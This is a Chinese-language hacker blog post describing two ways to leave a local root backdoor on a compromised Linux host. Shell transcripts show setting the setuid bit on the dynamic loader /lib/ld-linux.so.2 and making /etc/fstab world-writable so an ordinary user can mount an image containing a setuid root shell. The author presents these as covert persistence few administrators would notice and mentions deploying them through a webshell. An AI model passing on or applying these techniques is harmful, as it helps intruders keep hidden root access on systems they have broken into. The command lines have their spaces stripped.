Linux下留本地后门的两个方法

　　方法一：setuid的方法，其实8是很隐蔽。看看过程:
　　[root@localdomainlib]#ls-l|grepld-linux
　　lrwxrwxrwx1rootroot92008-06-0717:32ld-linux.so.2->ld-2.7.so
　　lrwxrwxrwx1rootroot132008-06-0717:47ld-lsb.so.3->ld-linux.so.2
　　[root@localdomainlib]#chmod+sld-linux.so.2
　　[root@localdomainlib]#ls-l|grepld-2.7.so
　　-rwsr-sr-x1rootroot1289522007-10-1804:49ld-2.7.so
　　lrwxrwxrwx1rootroot92008-06-0717:32ld-linux.so.2->ld-2.7.so
　　[root@localdomainlib]#
　　我们这里给/lib/ld-linux.so.2这个文件（在FC8里，它指向ld-2.7.so这个文件）加了setuid属性。然后我们看怎么利用它。
　　普通用户登录，测试下权限：
　　[xiaoyu@localdomain~]$whoami
　　xiaoyu
　　[xiaoyu@localdomain~]$/lib/ld-linux.so.2`whichwhoami`
　　root
　　[xiaoyu@localdomain~]$
　　恩，嘿嘿root了吧，具体怎么生成rootshell，你们自己去想吧，凡事都不要点得太透，对吧。呵呵，可以肯定的一点，/lib/ld-linux.so.2/bin/sh肯定生成不了rootshell，bash检查euid和uid，看是否相等...OK，不多说了。
 
　　方法二：
　　[root@localdomainetc]#chmoda+w/etc/fstab
　　[root@localdomainetc]#
　　这就留好了。此方法比较XXOXX，估计没几个管理员知道。利用方法演示下
　　[xiaoyu@localdomain~]$ls-l/etc/fstab
　　-rw-rw-rw-1rootroot4562008-06-0717:28/etc/fstab
　　[xiaoyu@localdomain~]$echo'test/mntext2user,suid,exec,loop00'>>/etc/fstab
　　然后从本机把一个文件到目标机器上去，这里我们命名为test
　　[xiaoyu@localdomaintmp]$ls-ltest
　　-rw-rw-r--1xiaoyuxiaoyu1024002008-04-2002:51test
　　[xiaoyu@localdomaintmp]$mounttest
　　[xiaoyu@localdomaintmp]$cd/mnt
　　[xiaoyu@localdomainmnt]$ls-l
　　total18
　　drwx------2rootroot122882008-04-2005:44lost+found
　　-rwsr-sr-x1rootroot49272008-04-2005:44root
　　[xiaoyu@localdomainmnt]$./root
　　sh-3.2#
　　看到了吧，从普通用户提升到root了。呵呵。
　　test这个文件baidu貌似木有上传功能撒，木办法传
　　貌似可能有人说本地后门木啥鸟用，但是你要搞清楚：一个webshell里面就可以完成这一切....

 
*
*